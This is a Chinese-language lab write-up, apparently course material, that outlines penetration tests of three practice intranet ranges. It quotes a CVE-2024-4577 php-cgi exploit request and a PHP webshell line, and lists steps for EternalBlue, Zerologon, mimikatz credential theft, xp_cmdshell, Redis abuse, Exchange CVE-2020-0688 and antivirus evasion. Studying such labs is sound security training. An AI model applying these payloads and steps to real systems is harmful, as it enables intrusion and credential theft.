小迪安全2024内网靶场-VPC1 & VPC2 & VPC3 渗透测试教学文档<\/h1>

VPC1 渗透测试流程<\/h2>

初始访问<\/h3>

入口机器<\/strong>: 192.168.133.185<\/li>

漏洞利用<\/strong>: PHP 8.2.12 CVE-2024-4577 RCE漏洞
\/php-cgi\/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a\/\/input <\/span><\/span><\/code><\/pre><\/li> 写入Webshell<\/strong>: <?<\/span>php<\/span> <\/span><\/span>file_put_contents<\/span>('\/test.php'<\/span>, '<?php eval($_POST["test"]);'<\/span>); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> 文件位置确认<\/strong>: 上传目录: C:\xampp\php<\/code><\/li> Web目录: C:\xampp\htdocs<\/code><\/li> <\/ul> <\/li> <\/ol> 横向移动<\/h3> 网络探测<\/strong>: 发现其他主机: 192.168.2.4<\/li> <\/ul> <\/li> MS17-010(永恒之蓝)利用<\/strong>: 使用Metasploit的ms17_010<\/code>模块<\/li> 成功上线192.168.2.4<\/li> <\/ul> <\/li> 权限维持<\/strong>: 上传后门: upload \home\kali\Desktop\test2.exe C:\test2.exe<\/code><\/li> <\/ul> <\/li> 凭证窃取<\/strong>: 使用mimikatz抓取明文密码失败<\/li> 进程注入降权至administrator后成功抓取<\/li> <\/ul> <\/li> 横向移动<\/strong>: 192.168.2.4有防火墙，正向上线192.168.2.6<\/li> <\/ul> <\/li> Weblogic服务发现<\/strong>: 扫描到192.168.4.*网段的7001端口<\/li> 上传内存马&CS后门上线192.168.4.128<\/li> <\/ul> <\/li> 域控提权<\/strong>: 使用CVE-2020-1472清空域控凭证<\/li> 使用sectetsdump.py获取域控hash<\/li> 使用psexec横向移动<\/li> <\/ul> <\/li> <\/ol> VPC2 渗透测试流程<\/h2> 初始访问<\/h3> 入口机器<\/strong>: 192.168.133.189<\/li> 服务发现<\/strong>: 8080端口Tomcat服务<\/li> 弱口令登录后台，部署war包getshell<\/li> <\/ul> <\/li> <\/ol> 信息收集<\/h3> 域信息<\/strong>: net user \/domain<\/code> & ping dc<\/code>确认域控IP<\/li> <\/ul> <\/li> 数据库发现<\/strong>: 扫描常见数据库端口<\/li> 在C:\WebCode\dangan\Web.config<\/code>找到数据库密码<\/li> <\/ul> <\/li> <\/ol> 横向移动<\/h3> 数据库提权<\/strong>: 使用mudt连接MSSQL<\/li> 开启xp_cmdshell执行命令<\/li> <\/ul> <\/li> 免杀技术<\/strong>: 火绒拦截certutil.exe<\/li> 分离免杀后门成功上线<\/li> <\/ul> <\/li> 域内探测<\/strong>: 发现192.168.3.*网段<\/li> 通达OA工具利用<\/li> <\/ul> <\/li> 域控提权<\/strong>: CVE-2020-1472获取hash<\/li> hash传递上线192.168.3.20<\/li> <\/ul> <\/li> 约束委派攻击<\/strong>: 使用Adfind探测约束委派<\/li> 上传后门至192.168.4.20并执行<\/li> <\/ul> <\/li> <\/ol> VPC3 渗透测试流程<\/h2> 初始访问<\/h3> 入口机器<\/strong>: 192.168.133.198<\/li> Redis未授权访问<\/strong>: 写入公钥getshell<\/li> <\/ul> <\/li> <\/ol> 横向移动<\/h3> 后门部署<\/strong>: MSF生成后门并启动HTTP服务<\/li> 目标主动下载后门<\/li> <\/ul> <\/li> SSH连接发现<\/strong>: 检查~\/.bash_history<\/code>发现SSH连接行为<\/li> 成功连接192.168.52.20<\/li> <\/ul> <\/li> 多层代理<\/strong>: 配置socks5代理<\/li> 使用stowaway建立多层代理<\/li> <\/ul> <\/li> Exchange攻击<\/strong>: 发现Exchange服务<\/li> CVE-2020-0688利用<\/li> 使用ysoserial.exe生成payload<\/li> <\/ul> <\/li> Windows Defender绕过<\/strong>: 横向移动手法拦截较少<\/li> PS1后门转换为exe免杀<\/li> <\/ul> <\/li> <\/ol> 关键工具与技术总结<\/h2> 漏洞利用<\/strong>:<\/p> PHP CVE-2024-4577<\/li> MS17-010(永恒之蓝)<\/li> CVE-2020-1472(域控提权)<\/li> CVE-2020-0688(Exchange)<\/li> <\/ul> <\/li> 横向移动技术<\/strong>:<\/p> 数据库提权(xp_cmdshell)<\/li> 约束委派攻击<\/li> hash传递攻击<\/li> psexec横向移动<\/li> <\/ul> <\/li> 免杀技术<\/strong>:<\/p> 分离免杀后门<\/li> PS1转exe免杀<\/li> 绕过火绒\/Windows Defender<\/li> <\/ul> <\/li> 代理技术<\/strong>:<\/p> socks5代理<\/li> stowaway多层代理<\/li> <\/ul> <\/li> 信息收集工具<\/strong>:<\/p> Adfind(域信息收集)<\/li> mimikatz(凭证窃取)<\/li> secretsdump.py(hash提取)<\/li> <\/ul> <\/li> <\/ol> 注意事项<\/h2> 靶机环境可能存在防火墙限制，需要采用正向连接<\/li> 不同杀软(火绒\/Windows Defender)需要采用不同绕过技术<\/li> 域环境渗透需注意约束委派等高级攻击手法<\/li> 多层代理是复杂内网渗透的关键技术<\/li> <\/ol>